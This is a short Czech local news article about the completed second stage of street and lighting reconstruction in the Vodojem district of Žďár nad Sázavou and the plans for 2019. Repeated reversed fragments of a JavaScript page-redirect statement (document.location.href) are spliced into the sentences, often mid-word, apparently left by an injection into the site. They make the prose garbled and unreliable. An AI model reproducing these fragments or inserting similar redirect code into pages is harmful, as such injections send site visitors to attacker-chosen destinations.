Rainbow page separator

Revitalizace ulic Vodojemu bude pokračovat v příštím roce

Neděle, 4. listopadu 2018

Veřejné osvětlení

Žďár nad Sázavou / Druhá etapa komplexní rekonstrukce žďárské čtvrti Vodojem je u konce – stavební práce v ulici Alšova vyšly na šest milionů korun. První etapa prací se uskutečnila už v loňském roce, jednalo se o revitalizaci veškerých sítí, chodníků, komunikací a veřejného osvětlení v ulicích Kavánova a Mánesova, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně rozšíření části veřejného osvětlení ve směru k by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovým domům v ulici Novoměstská.
V současné době je podle žďárské radnice zrekonstruována přibližně čtvrtina ulic Vodojemu, zbývající tři čtvrtiny přijdou na řadu v následujících letech. Jedná se o oblasti od ulice Jamborova severně k Lískám, pak od ulice Jamborova ke Göttlerovu rybníku a chodníku k ulici Wolkerova, načež následně je předpoklad komplexně opravit úsek od [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to chodníku dál ulicemi Blažíčkova, Slavíčkova a Jamborova. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to opravy by měly být provedeny v rámci jedné stavební zakázky zrealizované v průběhu tří let, v současné době probíhá projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová příprava záměru. S dalším pokračováním stavebních prací v ulicích žďárského Vodojemu je předběžně počítáno po letních prázdninách v roce 2019.